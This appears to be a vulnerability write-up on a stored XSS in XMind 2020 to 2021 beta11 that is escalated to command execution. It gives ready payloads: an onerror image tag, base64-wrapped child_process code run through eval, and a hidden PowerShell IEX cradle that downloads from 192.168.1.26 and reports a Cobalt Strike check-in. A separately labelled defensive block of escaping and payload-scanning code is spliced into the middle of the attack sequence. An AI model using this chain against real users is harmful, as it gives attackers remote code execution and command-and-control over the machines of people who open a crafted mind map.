Introduction
XMind is a professional, globally leading commercial mind-mapping application that is widely used in China. It offers a rich feature set, including thought management, business presentations and integration with office software. Built on the Eclipse RCP architecture, it combines mind mapping and brainstorming in a single visual thinking tool that can be used to capture ideas, organise thoughts, manage complex information and support team collaboration. Lifehacker once named XMind the "best brainstorming and mind-mapping tool" and the "most popular mind-mapping software".
Affected versions
XMind 2020 through XMind 2021 beta11 are all affected by this vulnerability.
Reproduction
Download the latest version of XMind from the official site and install it.
Open it and test for the XSS vulnerability.
Create a new template and enter the payload into a topic, then click Outline. Either saving on the outline page, or moving the cursor to the topic bar and then moving it down, triggers the vulnerability.
XSS payload
<img src=1 onerror=alert(1)>
Building a command-execution payload
whoami
const tenet = require('child_process')
tenet.exec('whoami',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });
Base64-encoded
Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7
Final payload
<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'>
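Two things combine in the payloads above: the outline view treats the topic text as HTML (so the onerror handler fires), and the renderer exposes Node's require (so the handler can reach child_process). The following is an added example, not XMind's code, showing the defensive counterpart: topic text is escaped before it is placed into markup, and a triage scanner for titles already saved in a document recognises the inline-event-handler, eval and base64-wrapped child_process pattern used in this post and decodes the wrapped script for the analyst. The function names, the heuristics and the SAMPLE_TOPICS input are assumptions of this example; the sample list is constructed here.

```javascript
// Added example, not XMind's code: defensive counterpart to the payloads above.
// Runs under Node.js (Buffer is used for the base64 decoding in the scanner).

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the characters that let text break out of an HTML text or attribute
// context, so "<img src=1 onerror=alert(1)>" is displayed literally.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the outline row for a topic. The title is escaped before it is
// concatenated into markup; no part of it is ever parsed as HTML.
function renderOutlineRow(topicTitle) {
  return `<li class="outline-topic">${escapeHtml(topicTitle)}</li>`;
}

// Heuristic triage for titles already stored in a document. Returns the
// reasons a title looks like the injected payload in this post and, when the
// eval(new Buffer(`...`,`base64`)) wrapper is present, the decoded script.
function scanTopicTitle(topicTitle) {
  const s = String(topicTitle);
  const reasons = [];
  if (/<\s*[a-z][\w-]*[^>]*\bon[a-z]+\s*=/i.test(s)) reasons.push('inline event handler');
  if (/\beval\s*\(/.test(s)) reasons.push('eval()');
  if (/child_process/.test(s)) reasons.push('child_process');
  let decoded = null;
  const wrapped = s.match(/Buffer\s*\(\s*`([A-Za-z0-9+/=]+)`\s*,\s*`base64`\s*\)/);
  if (wrapped) {
    decoded = Buffer.from(wrapped[1], 'base64').toString('utf8');
    if (/child_process/.test(decoded)) reasons.push('base64-wrapped child_process');
  }
  return { suspicious: reasons.length > 0, reasons, decoded };
}

// Walk a list of topic titles and return only the ones worth a closer look.
function triageTopics(topics) {
  return topics
    .map((title) => ({ title, ...scanTopicTitle(title) }))
    .filter((r) => r.suspicious);
}

// Constructed sample input: two ordinary titles, the XSS probe from this post,
// and a base64-wrapped title assembled here so the decoding step is exercised.
const WRAPPED_SCRIPT = Buffer.from("const tenet = require('child_process')").toString('base64');
const SAMPLE_TOPICS = [
  'Q3 roadmap',
  'Risks & assumptions',
  '<img src=1 onerror=alert(1)>',
  `<img src=x onerror='eval(new Buffer(\`${WRAPPED_SCRIPT}\`,\`base64\`).toString())'>`,
];

for (const title of SAMPLE_TOPICS) console.log(renderOutlineRow(title));
for (const hit of triageTopics(SAMPLE_TOPICS)) console.log(hit);
```

Escaping at the point where text meets markup is what stops the XSS itself; the scanner is only a triage aid for documents that were created before that fix. At the Electron level, the general hardening is to create the BrowserWindow with nodeIntegration: false and contextIsolation: true, so that a script injected into the renderer has no require to call; this post does not show how XMind's window is configured.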
Running ipconfig /all
Cobalt Strike check-in
Checking in via PowerShell
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.26:80/xmind'))"
Building the command-execution payload
const tenet = require('child_process')
tenet.exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.1.26:80/xmind\'))"',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });
Base64-encoded
Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=
Final payload
<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>
Check-in succeeded